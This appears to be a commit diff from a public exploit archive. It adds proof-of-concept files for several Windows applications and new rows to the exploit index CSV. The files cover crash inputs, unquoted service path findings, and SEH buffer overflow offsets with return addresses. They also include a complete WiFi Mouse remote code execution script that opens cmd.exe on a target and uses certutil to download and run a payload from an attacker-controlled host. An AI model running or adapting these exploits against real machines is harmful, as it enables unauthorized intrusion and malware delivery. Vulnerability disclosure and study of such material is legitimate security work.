# Exploit Title: Scdbg 1.0 - Buffer overflow DoS
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-06-13
# Vendor Homepage: http://sandsprite.com/blogs/index.php?uid=7&pid=152
# Software Link : https://github.com/dzzie/VS_LIBEMU
# Tested Version: 1.0 - Compile date: Jun 3 2021 20:57:45
# Tested on: Windows 7, 10
CVSS v3: 7.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: CWE-400
Vulnerability description: scdbg.exe (all versions) is affected by a Denial
of Service vulnerability that occurs when you use the /foff parameter or
not with a specific shellcode causing it to shutdown. Any malware could use
this option to evade the scan.
Proof of concept:
Save this script like scdbg_crash.py and execute it: scdbg.exe -foff 1 -f
scdbg_crash.bin / scdbg.exe -f scdbg_crash.bin
#!/usr/bin/env python
crash = "\x90\xF6\x84\x01\x90\x90\x90\x90"
f = open ("scdbg_crash.bin", "w")
f.write(crash)
f.close()
You can use gui_launcher.exe and check "Start offset 0x": 1 or directly
without check
[image: image.png]

35
exploits/windows/local/51064.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path
# Exploit Author: Luis Martinez
# Discovery Date: 2022-10-05
# Vendor Homepage: https://www.infonetsoftware.com
# Software Link : https://www.infonetsoftware.com/soft/instalar_Medicont_x.exe
# Tested Version: 3.7.27
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "medicont3" | findstr /i /v """
servermedicontservice servermedicontservice C:\Program Files (x86)\medicont3\servermedicontservice.exe Auto
# Service info:
C:\>sc qc "servermedicontservice"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: servermedicontservice
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\medicont3\servermedicontservice.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : servermedicontservice
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

35
exploits/windows/local/51065.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path
# Exploit by: Luis Martinez
# Discovery Date: 2022-10-05
# Vendor Homepage: https://www.gestionaleopen.org/
# Software Link : https://www.gestionaleopen.org/download/
# Tested Version: 12.00.00
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DB_GO_80" | findstr /i /v """
DB_GO_80 DB_GO_80 C:\Gestionale_Open\MySQL80\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL80\my.ini DB_GO_80 Auto
# Service info:
C:\>sc qc "DB_GO_80"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DB_GO_80
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Gestionale_Open\MySQL80\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL80\my.ini DB_GO_80
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DB_GO_80
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

27
exploits/windows/local/51076.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path
# Discovery by: Ismael Nava
# Discovery Date: 10-13-2022
# Vendor Homepage: https://pjo2.github.io/tftpd64/
# Software Links : https://bitbucket.org/phjounin/tftpd64/downloads/Tftpd32_SE-4.60-setup.exe
# Tested Version: 4.60
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Home 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
Tftpd32 service edition Tftpd32_svc C:\Program Files (x86)\Tftpd32_SE\tftpd32_svc.exe Auto
C:\>sc qc Tftpd32_svc
NOMBRE_SERVICIO: Tftpd32_svc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Tftpd32_SE\tftpd32_svc.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Tftpd32 service edition
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

34
exploits/windows/local/51077.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: Explorer32++ 1.3.5.531 - Buffer overflow
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-01-09
# Vendor Homepage: http://www.explorerplusplus.com/
# Software Link : http://www.explorerplusplus.com/
# Tested Version: 1.3.5.531
# Tested on: Windows 10
CVSS v3: 7.3
CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119
Buffer overflow controlling the Structured Exception Handler (SEH) records
in Explorer++ 1.3.5.531, and possibly other versions, may allow attackers
to execute arbitrary code via a long file name argument.
Proof of concept:
Open Explorer32++.exe from command line with a large string in Arguments,
more than 396 chars:
File '<Explorer++_PATH>\Explorer32++.exe'
Arguments
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...'
SEH chain of main thread
Address SE handler
0018FB14 00690041
00370069 *** CORRUPT ENTRY ***
0BADF00D [+] Examining SEH chain
0BADF00D SEH record (nseh field) at 0x0018fb14 overwritten with
unicode pattern : 0x00370069 (offset 262), followed by 626 bytes of cyclic
data after the handler

47
exploits/windows/local/51078.txt Normal file
View file

@ -0,0 +1,47 @@
# Exploit Title: Frhed (Free hex editor) v1.6.0 - Buffer overflow
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-01-09
# Vendor Homepage: http://frhed.sourceforge.net/
# Software Link : http://frhed.sourceforge.net/
# Tested Version: 1.6.0
# Tested on: Windows 10
CVSS v3: 7.3
CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119
Buffer overflow controlling the Structured Exception Handler (SEH) records
in Frhed (Free hex editor) v1.6.0, and possibly other versions, may allow
attackers to execute arbitrary code via a long file name argument.
Proof of concept:
Open Frhed.exe from command line with a large string in Arguments, more
than 494 chars:
File '<Frhed_PATH>\Frhed.exe'
Arguments
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...'
SEH chain of main thread
Address SE handler
0018FC8C 41367141
35714134 *** CORRUPT ENTRY ***
0BADF00D [+] Examining SEH chain
0BADF00D SEH record (nseh field) at 0x0018fc8c overwritten with
normal pattern : 0x35714134 (offset 494), followed by 876 bytes of cyclic
data after the handler
0BADF00D ------------------------------
'Targets' =>
[
[ '<fill in the OS/app version here>',
{
'Ret' => 0x00401ba7, #
pop ecx # pop ecx # ret - Frhed.exe (change this value by other without
\x00)
'Offset' => 494
}
],
],

47
exploits/windows/local/51079.txt Normal file
View file

@ -0,0 +1,47 @@
# Exploit Title: Resource Hacker 3.6.0.92 - Buffer overflow
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-01-06
# Vendor Homepage: http://www.angusj.com/resourcehacker/
# Software Link : http://www.angusj.com/resourcehacker/
# Tested Version: 3.6.0.92
# Tested on: Windows 10
CVSS v3: 7.3
CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119
Heap-based buffer overflow controlling the Structured Exception Handler
(SEH) records in Reseource Hacker v3.6.0.92, and possibly other versions,
may allow attackers to execute arbitrary code via a long file name argument.
Proof of concept:
Open ResHacker.exe from command line with a large string in Arguments, more
than 268 chars:
File 'C:\ResourceHacker36\ResHacker.exe'
Arguments
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac...'
SEH chain of main thread
Address SE handler
0018FCB4 316A4130
6A413969 *** CORRUPT ENTRY ***
0BADF00D [+] Examining SEH chain
0BADF00D SEH record (nseh field) at 0x0018fcb4 overwritten with
normal pattern : 0x6a413969 (offset 268), followed by 12 bytes of cyclic
data after the handler
0BADF00D ------------------------------
'Targets' =>
[
[ '<fill in the OS/app version here>',
{
'Ret' => 0x00426446, #
pop eax # pop ebx # ret - ResHacker.exe (change this value from Mona,
with a not \x00 ret address)
'Offset' => 268
}
],
],

39
exploits/windows/local/51090.py Executable file
View file

@ -0,0 +1,39 @@
# Exploit Title: AVS Audio Converter 10.3 - Stack Overflow (SEH)
# Discovered by: Yehia Elghaly - Mrvar0x
# Discovered Date: 2022-10-16
# Tested Version: 10.3.1.633
# Tested on OS: Windows 7 Professional x86
#pop+ret Address=005154E6
#Message= 0x005154e6 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [AVSAudioConverter.exe]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v10.3.1.633 (C:\Program Files\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)
# The only module that has SafeSEH disabled.
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll |
# 0x00400000 | 0x01003000 | False | False | False | False | False |
#Allocating 4-bytes for nSEH which should be placed directly before SEH which also takes up 4-bytes.
#Buffer = '\x41'* 260
#nSEH = '\x42'*4
#SEH = '\x43'*4
#ESI = 'D*44' # ESI Overwrite
#buffer = "A"*260 + [nSEH] + [SEH] + "D"*44
#buffer = "A"*260 + "B"*4 + "\xE6\x54\x51\x05" + "D"*44
# Rexploit:
# Generate the 'evil.txt' payload using python 2.7.x on Linux.
# Open the file 'evil.txt' Copy.
# Paste at'Output Folder and click 'Browse'.
#!/usr/bin/python -w
filename="evil.txt"
buffer = "A"*260 + "B"*4 + "C"*4 + "D"*44
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

69
exploits/windows/remote/51072.py Executable file
View file

@ -0,0 +1,69 @@
# Exploit Title: WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)
# Date: 13-10-2022
# Author: Payal
# Vendor Homepage: http://necta.us/
# Software Link: http://wifimouse.necta.us/#download
# Version: 1.8.3.2
# Tested on: Windows 10 Pro Build 21H2
# Desktop Server software used by mobile app has PIN option which does not to prevent command input.# Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input.
#!/usr/bin/env python3
from socket import socket, AF_INET, SOCK_STREAMfrom time import
sleepimport sysimport string
target = socket(AF_INET, SOCK_STREAM)
port = 1978
try:
rhost = sys.argv[1]
lhost = sys.argv[2]
payload = sys.argv[3]except:
print("USAGE: python " + sys.argv[0]+ " <target-ip>
<local-http-server-ip> <payload-name>")
exit()
characters={
"A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",
"O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",
"a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",
"o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",
"1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",
" ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",
">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",
"(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",
"\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"}
def openCMD():
target.sendto(bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a"),
(rhost,port)) # openfile /C/Windows/System32/cmd.exe
def SendString(string):
for char in string:
target.sendto(bytes.fromhex("7574663820" + characters[char] +
"0a"),(rhost,port)) # Sends Character hex with packet padding
sleep(0.03)
def SendReturn():
target.sendto(bytes.fromhex("6b657920203352544e"),(rhost,port)) #
'key 3RTN' - Similar to 'Remote Mouse' mobile app
sleep(0.5)
def exploit():
print("[+] 3..2..1..")
sleep(2)
openCMD()
print("[+] *Super fast hacker typing*")
sleep(1)
SendString("certutil.exe -urlcache -f http://" + lhost + "/" +
payload + " C:\\Windows\\Temp\\" + payload)
SendReturn()
print("[+] Retrieving payload")
sleep(3)
SendString("C:\\Windows\\Temp\\" + payload)
SendReturn()
print("[+] Done! Check Your Listener?")
def main():
target.connect((rhost,port))
exploit()
target.close()
exit()
if __name__=="__main__":
main()

35
files_exploits.csv
View file

@ -3709,6 +3709,12 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44284,exploits/hardware/remote/44284.py,"MikroTik RouterOS < 6.38.4 (x86) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware,,2018-03-13,2018-03-13,0,,,,,,https://github.com/BigNerd95/Chimay-Red/tree/36faf04e9ffb224811e0ac074a62126fdca7a92f
44290,exploits/hardware/remote/44290.py,"MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow",2018-03-15,CoreLabs,remote,hardware,,2018-03-16,2018-03-16,0,CVE-2018-7445,,,,,https://www.reddit.com/r/netsec/comments/84o6ki/mikrotik_routeros_smb_buffer_overflow/
46444,exploits/hardware/remote/46444.txt,"MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass",2019-02-21,"Jacob Baines",remote,hardware,,2019-02-21,2019-02-21,1,CVE-2019-3924,,,,,
51094,exploits/hardware/remote/51094.txt,"MiniDVBLinux 5.4 - Change Root Password",2023-03-27,LiquidWorm,remote,hardware,,2023-03-27,2023-03-27,0,,,,,,
51096,exploits/hardware/remote/51096.py,"MiniDVBLinux 5.4 - Remote Root Command Injection",2023-03-27,LiquidWorm,remote,hardware,,2023-03-27,2023-03-27,0,,,,,,
51097,exploits/hardware/remote/51097.py,"MiniDVBLinux 5.4 - Arbitrary File Read",2023-03-27,LiquidWorm,remote,hardware,,2023-03-27,2023-03-27,0,,,,,,
51095,exploits/hardware/remote/51095.txt,"MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure",2023-03-27,LiquidWorm,remote,hardware,,2023-03-27,2023-03-27,0,,,,,,
51093,exploits/hardware/remote/51093.txt,"MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE)",2023-03-27,LiquidWorm,remote,hardware,,2023-03-27,2023-03-27,0,,,,,,
51091,exploits/hardware/remote/51091.txt,"MiniDVBLinux <=5.4 - Config Download Exploit",2023-03-27,LiquidWorm,remote,hardware,,2023-03-27,2023-03-27,0,,,,,,
43061,exploits/hardware/remote/43061.txt,"MitraStar DSL-100HN-T1/GPT-2541GNAC - Privilege Escalation",2017-10-28,j0lama,remote,hardware,,2017-10-30,2017-10-30,0,,,,,,
50351,exploits/hardware/remote/50351.txt,"Mitrastar GPT-2541GNAC-N1 - Privilege escalation",2021-09-29,"Leonardo Nicolas Servalli",remote,hardware,,2021-09-29,2022-05-17,0,CVE-2021-42165,,,,,
26075,exploits/hardware/remote/26075.txt,"MobileIron Virtual Smartphone Platform - Privilege Escalation",2013-06-10,prdelka,remote,hardware,,2013-06-10,2013-06-10,0,OSVDB-94198,,,,,
@ -5604,6 +5610,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42439,exploits/jsp/webapps/42439.txt,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Server-Side Request Forgery",2017-08-09,LiquidWorm,webapps,jsp,,2017-08-10,2017-08-10,0,,,,,,
42436,exploits/jsp/webapps/42436.py,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration",2017-08-09,LiquidWorm,webapps,jsp,,2017-08-10,2017-08-10,0,,,,,,
37550,exploits/jsp/webapps/37550.txt,"DataWatch Monarch Business Intelligence - Multiple Input Validation Vulnerabilities",2012-07-31,"Raymond Rizk",webapps,jsp,,2012-07-31,2015-07-10,1,,,,,,https://www.securityfocus.com/bid/54733/info
51082,exploits/jsp/webapps/51082.txt,"Desktop Central 9.1.0 - Multiple Vulnerabilities",2023-03-27,"Rafael Pedrero",webapps,jsp,,2023-03-27,2023-03-27,0,,,,,,
46825,exploits/jsp/webapps/46825.txt,"dotCMS 5.1.1 - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,jsp,,2019-05-10,2019-05-10,0,,,,,,
34928,exploits/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",webapps,jsp,,2014-10-09,2014-10-09,0,OSVDB-113063;OSVDB-113062;OSVDB-113061;OSVDB-113060;OSVDB-113059,,,,,
39402,exploits/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",webapps,jsp,80,2016-02-02,2016-02-02,0,CVE-2015-4593;CVE-2015-4594;CVE-2015-4592;CVE-2015-4591,,,,,
@ -11643,6 +11650,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45990,exploits/multiple/webapps/45990.txt,"Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure (2)",2018-12-14,alt3kx,webapps,multiple,,2018-12-14,2018-12-14,1,CVE-2018-7691,,,,,
49600,exploits/multiple/webapps/49600.rb,"FortiLogger 4.4.2.2 - Unauthenticated Arbitrary File Upload (Metasploit)",2021-03-01,"Berkan Er",webapps,multiple,,2021-03-01,2021-03-01,1,CVE-2021-3378,,,,,
50759,exploits/multiple/webapps/50759.txt,"Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)",2022-02-18,"Braiant Giraldo Villa",webapps,multiple,,2022-02-18,2022-02-18,0,CVE-2021-43062,,,,,
51092,exploits/multiple/webapps/51092.sh,"FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass",2023-03-27,"Felipe Alcantara",webapps,multiple,,2023-03-27,2023-03-27,0,CVE-2022-40684,,,,,
11186,exploits/multiple/webapps/11186.txt,"FreePBX 2.5.1 - SQL Injection",2010-01-18,"Ivan Huertas",webapps,multiple,,2010-01-17,,1,OSVDB-61919,,CYBSEC-Advisory2010-0103-FreePBX_2_5_1_SQL_Injection.pdf,,,
11187,exploits/multiple/webapps/11187.txt,"FreePBX 2.5.x - Information Disclosure",2010-01-18,"Ivan Huertas",webapps,multiple,,2010-01-17,,1,OSVDB-61918,,CYBSEC-Advisory2010-0101-FreePBX_2_5_x_Information_disclosure.pdf,,,
11184,exploits/multiple/webapps/11184.txt,"FreePBX 2.5.x < 2.6.0 - Persistent Cross-Site Scripting",2010-01-18,"Ivan Huertas",webapps,multiple,,2010-01-17,,1,OSVDB-61920,,CYBSEC-Advisory2010-0102-FreePBX_2_5_x-2_6_Permanent_XSS.pdf,,,
@ -13385,6 +13393,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
2513,exploits/php/webapps/2513.txt,"ae2 - 'standart.inc.php' Remote File Inclusion",2006-10-10,k1tk4t,webapps,php,,2006-10-09,,1,,,,,,
2377,exploits/php/webapps/2377.txt,"aeDating 4.1 - dir[inc] Remote File Inclusion",2006-09-16,NeXtMaN,webapps,php,,2006-09-15,,1,OSVDB-28924;CVE-2006-4870;OSVDB-28923,,,,,
1896,exploits/php/webapps/1896.txt,"aePartner 0.8.3 - 'dir[data]' Remote File Inclusion",2006-06-10,Kacper,webapps,php,,2006-06-09,2016-08-16,1,OSVDB-26332;CVE-2006-2996,,,,http://www.exploit-db.comaePartner-0.8.3.tar.gz,
51085,exploits/php/webapps/51085.txt,"Aero CMS v0.0.1 - PHP Code Injection (auth)",2023-03-27,"Hubert Wojciechowski",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
51083,exploits/php/webapps/51083.txt,"Aero CMS v0.0.1 - SQL Injection (no auth)",2023-03-27,"Hubert Wojciechowski",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
51022,exploits/php/webapps/51022.txt,"Aero CMS v0.0.1 - SQLi",2022-09-23,nu11secur1ty,webapps,php,,2022-09-23,2022-09-23,0,,,,,,
34038,exploits/php/webapps/34038.txt,"Aerohive HiveOS 5.1r5 < 6.1r5 - Multiple Vulnerabilities",2014-07-12,DearBytes,webapps,php,,2014-07-22,2014-07-22,0,OSVDB-109442;OSVDB-109441,,,,,
26263,exploits/php/webapps/26263.txt,"AEwebworks aeDating 3.2/4.0 - 'search_result.php' SQL Injection",2005-09-15,alexsrb,webapps,php,,2005-09-15,2013-06-18,1,CVE-2005-2985;OSVDB-19463,,,,,https://www.securityfocus.com/bid/14847/info
@ -14016,6 +14026,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34585,exploits/php/webapps/34585.txt,"Atmail Webmail 7.2 - Multiple Vulnerabilities",2014-09-08,smash,webapps,php,443,2014-09-09,2014-09-09,1,OSVDB-111565;OSVDB-111564;OSVDB-111563;OSVDB-111562,,,http://www.exploit-db.com/screenshots/idlt35000/screen-shot-2014-09-09-at-150850.png,,
39015,exploits/php/webapps/39015.txt,"Atmail Webmail Server - Email Body HTML Injection",2014-01-14,"Zhao Liang",webapps,php,,2014-01-14,2015-12-17,1,CVE-2013-6017;OSVDB-101937,,,,,https://www.securityfocus.com/bid/64779/info
50840,exploits/php/webapps/50840.py,"Atom CMS 2.0 - Remote Code Execution (RCE)",2022-03-30,"Ashish Koli",webapps,php,,2022-03-30,2022-03-30,0,,,,,,
51086,exploits/php/webapps/51086.txt,"Atom CMS v2.0 - SQL Injection (no auth)",2023-03-27,"Hubert Wojciechowski",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
30161,exploits/php/webapps/30161.txt,"Atom Photoblog 1.0.1/1.0.9 - 'AtomPhotoblog.php' Multiple Input Validation Vulnerabilities",2007-06-07,Serapis.net,webapps,php,,2007-06-07,2016-12-21,1,CVE-2007-3134;OSVDB-37046,,,,http://www.exploit-db.comatomphotoblogV1.0.9.1.zip,https://www.securityfocus.com/bid/24363/info
6125,exploits/php/webapps/6125.txt,"Atom Photoblog 1.1.5b1 - 'photoId' SQL Injection",2008-07-24,Mr.SQL,webapps,php,,2008-07-23,2016-12-21,1,OSVDB-47142;CVE-2008-3351,,,,http://www.exploit-db.comatomphotoblogV1.1.5b1.zip,
39238,exploits/php/webapps/39238.txt,"AtomCMS - SQL Injection / Arbitrary File Upload",2014-07-07,"Jagriti Sahu",webapps,php,,2014-07-07,2016-01-15,1,CVE-2014-4852;OSVDB-108788,,,,,https://www.securityfocus.com/bid/68437/info
@ -15090,6 +15101,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48113,exploits/php/webapps/48113.txt,"CandidATS 2.1.0 - Cross-Site Request Forgery (Add Admin)",2020-02-24,J3rryBl4nks,webapps,php,,2020-02-24,2020-02-24,0,,,,,http://www.exploit-db.comCandidATS210-Stable.zip,
21132,exploits/php/webapps/21132.txt,"Cannonbolt Portfolio Manager 1.0 - Multiple Vulnerabilities",2012-09-07,LiquidWorm,webapps,php,,2012-09-07,2012-09-07,0,OSVDB-85950;OSVDB-85949;OSVDB-85948,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5104.php
44882,exploits/php/webapps/44882.txt,"Canon PrintMe EFI - Cross-Site Scripting",2018-06-12,"Huy Kha",webapps,php,,2018-06-12,2018-06-12,0,CVE-2018-12111,,,,,
51063,exploits/php/webapps/51063.txt,"Canteen-Management v1.0 - SQL Injection",2023-03-27,nu11secur1ty,webapps,php,,2023-03-27,2023-03-27,0,,,,,,
51062,exploits/php/webapps/51062.txt,"Canteen-Management v1.0 - XSS-Reflected",2023-03-27,nu11secur1ty,webapps,php,,2023-03-27,2023-03-27,0,,,,,,
25071,exploits/php/webapps/25071.txt,"Captaris Infinite Mobile Delivery Webmail 2.6 - Full Path Disclosure",2005-01-29,steven@lovebug.org,webapps,php,,2005-01-29,2013-04-29,1,,,,,,https://www.securityfocus.com/bid/12399/info
22104,exploits/php/webapps/22104.txt,"Captaris Infinite WebMail 3.61.5 - HTML Injection",2002-12-16,"Pedram Amini",webapps,php,,2002-12-16,2012-10-20,1,,,,,,https://www.securityfocus.com/bid/6411/info
42582,exploits/php/webapps/42582.txt,"Car or Cab Booking Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",webapps,php,,2017-08-29,2017-08-29,0,,,,,,
@ -15397,6 +15410,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
15560,exploits/php/webapps/15560.txt,"ClanSphere 2010.0 Final - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",webapps,php,,2010-11-16,2010-11-16,0,OSVDB-69282;OSVDB-69281,,,,http://www.exploit-db.comclansphere_2010.1.zip,http://www.htbridge.ch/advisory/sql_injection_in_clansphere.html
35680,exploits/php/webapps/35680.txt,"ClanSphere 2011.0 - Local File Inclusion / Arbitrary File Upload",2011-04-28,KedAns-Dz,webapps,php,,2011-04-28,2015-01-03,1,,,,,,https://www.securityfocus.com/bid/47636/info
22181,exploits/php/webapps/22181.txt,"ClanSphere 2011.3 - 'cs_lang' Cookie Local File Inclusion",2012-10-23,blkhtc0rp,webapps,php,,2012-10-23,2016-10-24,1,OSVDB-86720,,,http://www.exploit-db.com/screenshots/idlt22500/clansphere.png,http://www.exploit-db.comclansphere_2011.3.zip,
51070,exploits/php/webapps/51070.txt,"Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)",2023-03-27,"Sinem Şahin",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
19051,exploits/php/webapps/19051.txt,"ClanSuite 2.9 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",webapps,php,,2012-06-11,2012-06-11,1,OSVDB-82901,,,,,
1662,exploits/php/webapps/1662.php,"Clansys 1.1 (showid) - SQL Injection",2006-04-10,snatcher,webapps,php,,2006-04-09,,1,OSVDB-24506;CVE-2006-1708,,,,,
1710,exploits/php/webapps/1710.txt,"Clansys 1.1 - 'index.php' PHP Code Insertion",2006-04-23,nukedx,webapps,php,,2006-04-22,,1,OSVDB-25083;CVE-2006-2005,,,,,http://www.nukedx.com/?viewdoc=29
@ -17821,6 +17835,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
17321,exploits/php/webapps/17321.txt,"Extcalendar 2.0b2 - 'cal_search.php' SQL Injection",2011-05-25,"High-Tech Bridge SA",webapps,php,,2011-05-25,2011-05-25,0,,,,,http://www.exploit-db.comextcal2.0_b2.zip,http://www.htbridge.ch/advisory/sql_injection_in_extcalendar_2.html
17562,exploits/php/webapps/17562.php,"ExtCalendar2 - Cookie Authentication Bypass / Backdoor Upload",2011-07-23,Lagripe-Dz,webapps,php,,2011-07-23,2017-10-20,0,,,,,http://www.exploit-db.comextcal2.0_b2.zip,
39816,exploits/php/webapps/39816.php,"eXtplorer 2.1.9 - '.ZIP' Directory Traversal",2016-05-16,hyp3rlinx,webapps,php,,2016-05-16,2016-05-16,0,CVE-2016-4313,,,,http://www.exploit-db.comeXtplorer_2.1.9.zip,http://hyp3rlinx.altervista.org/advisories/EXTPLORER-ARCHIVE-PATH-TRAVERSAL.txt
51067,exploits/php/webapps/51067.txt,"eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE)",2023-03-27,ErPaciocco,webapps,php,,2023-03-27,2023-03-27,0,,,,,,
7525,exploits/php/webapps/7525.txt,"Extract Website - 'Filename' File Disclosure",2008-12-19,"Cold Zero",webapps,php,,2008-12-18,2017-01-05,1,OSVDB-50915;CVE-2008-6334,,,,,
32547,exploits/php/webapps/32547.txt,"Extrakt Framework 0.7 - 'index.php' Cross-Site Scripting",2008-10-29,ShockShadow,webapps,php,,2008-10-29,2014-03-27,1,CVE-2008-6217;OSVDB-52282,,,,,https://www.securityfocus.com/bid/31971/info
26692,exploits/php/webapps/26692.txt,"Extreme Corporate 6.0 - 'Extremesearch.php' Cross-Site Scripting",2005-12-01,r0t,webapps,php,,2005-12-01,2013-07-08,1,CVE-2005-3972;OSVDB-21336,,,,,https://www.securityfocus.com/bid/15675/info
@ -18157,6 +18172,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
